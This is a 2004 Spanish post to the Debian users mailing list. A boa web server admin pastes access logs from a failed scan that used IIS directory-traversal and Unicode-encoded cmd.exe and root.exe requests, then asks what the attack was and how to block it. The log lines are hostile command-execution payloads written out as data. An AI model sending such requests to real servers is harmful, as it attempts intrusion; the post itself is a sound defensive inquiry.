Ataque al web server

To: Lista Debian en español <debian-user-spanish@lists.debian.org>
Subject: Ataque al web server
From: raulh@ciccp.es (Raúl Hernández)
Date: Sun, 8 Feb 2004 12:22:28 +0100
Message-id: <[🔎] 20040208112227.GA2077@sindominio.com>
Mail-followup-to: Lista Debian en español <debian-user-spanish@lists.debian.org>

Hola a tod@s,

tengo un servidor web montado con boa (sencillo y eficaz) para poder
ver la documentación de Debian desde Mozilla con dwww.

Esta máquina también hace de pasarela de mi mini-red local conectando
por ppp a inet.

Hoy me ha dado por revisar los logs de bos y me encuentro:

62.147.188.173 - - [25/Jan/2004:01:29:44 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
62.147.188.173 - - [25/Jan/2004:01:29:47 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
62.147.188.173 - - [25/Jan/2004:01:29:50 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
62.147.188.173 - - [25/Jan/2004:01:29:53 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
62.147.188.173 - - [25/Jan/2004:01:29:55 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
62.147.188.173 - - [25/Jan/2004:01:29:57 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 0 "-" "-"
62.147.188.173 - - [25/Jan/2004:01:30:00 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 0 "-" "-"
62.147.188.173 - - [25/Jan/2004:01:30:02 +0000] "GET
62.147.188./msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
62.147.188. HTTP/1.0" 404 0 "-" "-"
62.147.188.173 - - [25/Jan/2004:01:30:05 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
62.147.188.173 - - [25/Jan/2004:01:30:10 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
62.147.188.173 - - [25/Jan/2004:01:30:11 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
62.147.188.173 - - [25/Jan/2004:01:30:12 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
62.147.188.173 - - [25/Jan/2004:01:30:13 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
62.147.188.173 - - [25/Jan/2004:01:30:14 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"
62.147.188.173 - - [25/Jan/2004:01:30:16 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0
"-" "-"
62.147.188.173 - - [25/Jan/2004:01:30:18 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 "-"
"-"

Naturalmente mis direcciones IP son del tipo 192.168.0.0 por lo que
esto viene del exterior.

¿Alguien puede aclarar qué tipo de ataque es y como evitarlo en el
futuro? Entiendo que no ha tenido éxito, ya que los ficheros referidos
son WINDOG y no existen en mi sistema.

¿Es suficiente la directiva Listen 192.168.X.X en /etc/boa/boa.conf
para evitar estos temas?

También tengo las directivas en /etc/hosts.deny:
	ALL: PARANOID
	ALL: ALL
y permitiendo solo las direcciones locales en /etc/hosts.allow, por lo
que no me explico cómo han podido acceder desde inet siendo IPs fuera
del rango permitido.

Gracias y ...
-- 
Un saludo.
Raúl Hernández <raulh@ciccp.es>

Reply to:

Follow-Ups:
- Re: Ataque al web server
  - From: "Javi" <el_angel@fibertel.com.ar>
- Re: Ataque al web server
  - From: Mikel Fernández <mkl@mkl.no-ip.org>
- Re: Ataque al web server
  - From: "Fernando M. Maresca" <f_maresca@ciudad.com.ar>

Prev by Date: Loguearse contra Directorio Activo
Next by Date: Re: CUPS: media tray empty (solución)
Previous by thread: Re: Loguearse contra Directorio Activo
Next by thread: Re: Ataque al web server
Index(es):
- Date
- Thread